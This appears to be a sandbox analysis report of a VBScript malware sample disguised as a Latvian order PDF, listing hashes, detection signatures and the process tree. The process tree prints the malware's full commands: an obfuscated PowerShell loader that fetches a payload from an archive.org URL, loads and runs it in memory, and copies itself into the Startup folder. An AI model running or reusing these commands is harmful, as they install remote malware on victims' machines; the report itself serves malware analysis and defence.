Overview

overview

10

Static

static

1

PASUTIJUMU...df.vbs

windows7-x64

10

PASUTIJUMU...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 12:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs

  • Size

    502KB

  • MD5

    054770dd0e6f86d42f8df6f72265375b

  • SHA1

    bd012509b749be9acc1dd0a67b8519dedaf1c680

  • SHA256

    0a6ec56a9d84def4f2898df242f92e2aa9cf1bdf0d32bc0b710f4106bc3de651

  • SHA512

    4b2777eb1ff628dfa9f378879828b4d4f4ae19386108de94584683c2173b70e7347da1d55a8be19bf146576e36f3e6ea70c50ab78aed69689ea8ebf2b71ca9c8

  • SSDEEP

    12288:i6tQjLe5sR1aZdlZ7LVSFOzV3JMGeLF8azIdzzEV3J2m2Fjc1AkhbhBs3r:dY2SyPEED

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.razivarcsed.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PASUTIJUMU SARAKSTS 2112100 EUR DOKUMENTS SEPTEMBRIS PASUTIJUMA DOC pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.razivarcsed.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNnZndScrJ3JsJysnID0gJysnWlJ4aHR0cHM6Ly9pYTYwMDEnKycwMCcrJy51Jysncy5hcmNoaXZlLm9yJysnZy8nKycyNC9pdGVtJysncy9kZXRhaC1ub3RlLXYvJysnRGV0JysnYWgnKydObycrJ3RlVi50eHRaUng7NnZnYmEnKydzZTY0Q29udGVudCA9IChOJysnZXctTycrJ2JqJysnZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZScrJ250KS5Eb3dubG9hZFN0cmluZygnKyc2dmd1cmwpOzZ2ZycrJ2JpbmFyJysneUMnKydvbnRlbicrJ3QgPSBbU3lzJysndGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0UycrJ3RyaW4nKydnKCcrJzZ2Z2JhJysnc2U2NENvJysnbicrJ3RlJysnbnQpOycrJzZ2Z2Fzc2VtYmx5JysnID0gW1JlZmxlY3RpbycrJ24nKycuQXNzZW1iJysnbCcrJ3ldJysnOicrJzpMb2FkKDZ2JysnZ2JpbmFyJysneUMnKydvbnRlJysnbicrJ3QpJysnOzYnKyd2Z3QnKyd5cCcrJ2UgPSA2dmdhc3NlbWJseS5HZXRUJysneXBlKFpSeFJ1blBFJysnLkhvbWVaJysnUngpOzZ2Z21ldGhvZCA9IDYnKyd2Z3QnKyd5JysncGUnKycuR2V0JysnTWV0aG9kKFpSeFZBSVpSeCknKyc7NnZnbWV0aG9kLkludm9rZSg2dmdudWxsLCBbb2InKydqJysnZWN0WycrJ10nKyddJysnQCcrJyhaUngwLycrJ3Z1bycrJ29oL2QvZScrJ2UuZXQnKydzYXAnKycvLycrJzpzcHR0aFpSJysneCAsIFonKydSeCcrJ2Rlc2F0aScrJ3ZhJysnZG8nKydaJysnUngnKycgLCBaUnhkZXNhdGl2YWRvWlJ4ICcrJywgWicrJ1J4ZGVzYScrJ3RpdmFkb1pSeCcrJywnKydaUnhSZScrJ2dBc21aUngsWlJ4WicrJ1J4KSknKSAtcmVwTEFDZShbQ0hhUl05MCtbQ0hhUl04MitbQ0hhUl0xMjApLFtDSGFSXTM5LXJlcExBQ2UgKFtDSGFSXTU0K1tDSGFSXTExOCtbQ0hhUl0xMDMpLFtDSGFSXTM2KXwmKCAkZW52OkNPTXNQRWNbNCwxNSwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('6vgu'+'rl'+' = '+'ZRxhttps://ia6001'+'00'+'.u'+'s.archive.or'+'g/'+'24/item'+'s/detah-note-v/'+'Det'+'ah'+'No'+'teV.txtZRx;6vgba'+'se64Content = (N'+'ew-O'+'bj'+'ect System.Net.WebClie'+'nt).DownloadString('+'6vgurl);6vg'+'binar'+'yC'+'onten'+'t = [Sys'+'te'+'m.Convert]::FromBase64S'+'trin'+'g('+'6vgba'+'se64Co'+'n'+'te'+'nt);'+'6vgassembly'+' = [Reflectio'+'n'+'.Assemb'+'l'+'y]'+':'+':Load(6v'+'gbinar'+'yC'+'onte'+'n'+'t)'+';6'+'vgt'+'yp'+'e = 6vgassembly.GetT'+'ype(ZRxRunPE'+'.HomeZ'+'Rx);6vgmethod = 6'+'vgt'+'y'+'pe'+'.Get'+'Method(ZRxVAIZRx)'+';6vgmethod.Invoke(6vgnull, [ob'+'j'+'ect['+']'+']'+'@'+'(ZRx0/'+'vuo'+'oh/d/e'+'e.et'+'sap'+'//'+':sptthZR'+'x , Z'+'Rx'+'desati'+'va'+'do'+'Z'+'Rx'+' , ZRxdesativadoZRx '+', Z'+'Rxdesa'+'tivadoZRx'+','+'ZRxRe'+'gAsmZRx,ZRxZ'+'Rx))') -repLACe([CHaR]90+[CHaR]82+[CHaR]120),[CHaR]39-repLACe ([CHaR]54+[CHaR]118+[CHaR]103),[CHaR]36)|&( $env:COMsPEc[4,15,25]-jOiN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2328

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    a6644f122395e50cf6370ac6f6bfb977

    SHA1

    06d0ed6e0415d82b201e86c58d5887be8da95652

    SHA256

    9f7a27dc64a1c2a7ad31b80c2c930c98e973f4b6010e7f65b8e25a4bea6a238a

    SHA512

    114b7f6a2d24390f629cc7e3acd21c4ffeb634826d9101ea47bb54d2a89153c2f8a5bb84336f38e2a5d4ff8490f6f569ab0aae7c40862c1e1b8510dfa977daf8

    Download Submit

  • memory/2548-19-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2548-20-0x00000000029E0000-0x00000000029E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2824-5-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2824-6-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2824-8-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2824-9-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2824-10-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2824-7-0x0000000001C80000-0x0000000001C88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2824-11-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2824-12-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2824-13-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

    Filesize

    9.6MB

    Download